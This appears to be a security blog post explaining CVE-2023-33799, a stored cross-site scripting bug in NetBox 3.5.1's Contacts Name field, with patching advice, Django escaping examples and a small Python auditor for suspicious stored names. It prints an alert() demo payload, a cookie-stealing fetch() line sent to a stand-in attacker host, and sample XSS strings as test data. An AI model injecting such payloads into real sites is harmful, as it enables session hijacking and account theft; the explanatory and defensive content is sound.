NetBox is a popular open-source tool for managing IP address spaces and data center resources. But even mature projects can have security holes. In this long read, we explore CVE-2023-33799 — a stored cross-site scripting (XSS) bug in NetBox v3.5.1’s Create Contacts function. We'll break down what went wrong, show you how to exploit it, provide sample payloads, and share links to original references.
What is CVE-2023-33799?
CVE-2023-33799 is a security vulnerability in NetBox version 3.5.1. Specifically, it’s a stored XSS in the /tenancy/contacts/ route when creating Contacts. Attackers can inject JavaScript or HTML by putting a malicious payload in the Name field. Since this data is stored, any user viewing the Contacts list or details could be affected.
- Type: Stored Cross-Site Scripting (XSS)
- Component: Create Contacts (/tenancy/contacts/)
- CVE ID: CVE-2023-33799
Why is Stored XSS So Dangerous?
Unlike reflected XSS (which requires a victim to click a specific link), stored XSS persists on the server. Anyone who views the malicious entry gets hit, making this bug especially problematic on shared portals like NetBox.
Root Cause: Lack of Input Sanitization
The vulnerability exists because NetBox fails to sanitize or escape user input in the Name field before it gets displayed. JavaScript you insert is rendered and executed in others’ browsers.
Exploiting CVE-2023-33799 (With Code Snippet)
Let’s walk through how someone could exploit this in a standard NetBox v3.5.1 install.
A classic payload for demonstration is:
```html
<script>alert("NetBox XSS!");</script>
```
Fill out other required fields as needed, then submit.
Whenever someone views the Contacts page (list or detail), the stored script runs in their browser.
```javascript
fetch('https://attacker.com/steal?cookie='+document.cookie)
```
NetBox quickly fixed this flaw in later versions. Here’s how you can stay protected:
- Update NetBox: Always upgrade to the latest version. This bug is patched in versions after 3.5.1.
- NetBox GitHub Releases
- Input Sanitization: If you must run an older version, restrict who can modify Contacts and consider adding a web application firewall (WAF).
Technical References
- NVD: CVE-2023-33799
- Exploit DB: 51493
- NetBox Issue Tracker
- Official advisory
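To fix and prevent XSS, output user input through escaping libraries rather than rendering it directly:
```python
# In Python code, escape the value before placing it into HTML
from django.utils.html import escape
safe_name = escape(contact.name)  # contact is the Contact object being rendered
```
```django
{# In a Django template, apply the escape filter to the value #}
{{ contact.name|escape }}
```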
And always validate/sanitize user input at every layer.
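One way to apply that advice to Contact names, both as an input check and as a review of names already stored, is sketched below. This is an added example, not code from the original post or from NetBox; it uses only the Python standard library, and the record layout (`id`, `name`) and the sample contacts are constructed assumptions.

```python
import html
from html.parser import HTMLParser


class MarkupFinder(HTMLParser):
    """Collects every tag and risky attribute a browser would see in a string."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self.findings.append(f"<{tag}>")
        for key, value in attrs:
            # Attribute values arrive entity-decoded, as a browser would read them.
            if key.startswith("on"):
                self.findings.append(f"event handler {key}")
            elif value and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {key}")

    def handle_endtag(self, tag):
        self.findings.append(f"</{tag}>")


def find_markup(name):
    """Return the markup found in a contact name (empty list for plain text)."""
    finder = MarkupFinder()
    finder.feed(name)
    finder.close()
    return finder.findings


def audit_contacts(contacts):
    """Map contact id -> (findings, HTML-escaped name) for each suspicious name."""
    report = {}
    for contact in contacts:
        findings = find_markup(contact["name"])
        if findings:
            report[contact["id"]] = (findings, html.escape(contact["name"]))
    return report


# Constructed sample records (hypothetical layout, not real NetBox data).
SAMPLE_CONTACTS = [
    {"id": 1, "name": "Alice Example"},
    {"id": 2, "name": '<script>alert("NetBox XSS!");</script>'},
    {"id": 3, "name": "Smith & Sons, Inc."},
    {"id": 4, "name": "<img src=x onerror=alert(1)>"},
]

if __name__ == "__main__":
    for cid, (findings, safe) in audit_contacts(SAMPLE_CONTACTS).items():
        print(cid, findings, safe)
```

A name with any finding can be rejected at creation time or queued for cleanup; the escaped form is what should reach the page if the value is kept.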
Final Thoughts
XSS bugs like CVE-2023-33799 are easy to overlook — and even easier for attackers to abuse. Always sanitize user input and keep your software up to date. If you use NetBox, make sure you’re not running v3.5.1 anymore, and review any logs for suspicious “Contact” names just in case!
Stay safe and patch those systems!
References
- https://nvd.nist.gov/vuln/detail/CVE-2023-33799
- https://github.com/netbox-community/netbox/security/advisories/GHSA-k33w-9692-399p
- https://www.exploit-db.com/exploits/51493
Timeline
Published on: 05/24/2023 20:15:00 UTC
Last modified on: 05/27/2023 03:41:00 UTC